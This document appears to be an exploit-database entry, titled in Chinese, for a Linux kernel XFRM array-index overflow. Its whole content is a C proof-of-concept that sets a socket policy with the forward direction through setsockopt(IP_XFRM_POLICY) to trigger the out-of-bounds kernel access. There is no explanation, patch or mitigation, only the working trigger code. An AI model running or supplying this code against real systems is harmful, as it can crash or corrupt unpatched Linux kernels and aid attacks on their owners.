Linux Kernel XFRM数组索引溢出漏洞

                                                #include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#include <linux/xfrm.h>

#define IP_XFRM_POLICY 17

int 
main()
{
  int fd;
  struct sockaddr_in s_in;
  struct xfrm_userpolicy_info xp;
  
  inet_aton("192.168.13.8", &s_in.sin_addr);
  s_in.sin_family = AF_INET;
  s_in.sin_port = htons(555);
  fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP);
  if (fd < 0)
    {
      perror("socket");
      return 1;
    }
  if (connect(fd, (struct sockaddr *) &s_in, sizeof(s_in)) < 0)
    {
      perror("connect");
      return 1;
    }
  
  inet_aton("192.168.13.7", (struct in_addr *) &xp.sel.saddr);
  xp.sel.prefixlen_s = 32;
  inet_aton("192.168.13.8", (struct in_addr *) &xp.sel.daddr);
  xp.sel.prefixlen_d = 32;
  xp.sel.dport = 0;
  xp.sel.dport_mask = 0;
  xp.sel.sport = 0;
  xp.sel.sport_mask = 0;
  xp.sel.family = AF_INET;
  xp.sel.proto = 0;
  xp.sel.ifindex = 0;
  xp.sel.user = 0;
  xp.lft.soft_byte_limit = 10000000;
  xp.lft.hard_byte_limit = 10000000;
  xp.lft.soft_packet_limit = 10000000;
  xp.lft.hard_packet_limit = 10000000;
  xp.lft.soft_add_expires_seconds = 3600;
  xp.lft.hard_add_expires_seconds = 3600;
  xp.lft.soft_use_expires_seconds = 3600;
  xp.lft.hard_use_expires_seconds = 3600;
  xp.curlft.bytes = 0;
  xp.curlft.packets = 0;
  xp.curlft.add_time = 0;
  xp.curlft.use_time = 0;
  xp.priority = 0;
  xp.index = 0;
  xp.dir = XFRM_POLICY_FWD;
  xp.action = XFRM_POLICY_ALLOW;
  xp.flags = 0;
  xp.share = XFRM_SHARE_UNIQUE;
  
  if (setsockopt(fd, SOL_IP, IP_XFRM_POLICY, &xp, sizeof(xp)) < 0)
    {
      perror("setsockopt(IP_XFRM_POLICY)");
      return 1;
    }
  
  send(fd, "abrakadabra", 11, 0);
  close(fd);
}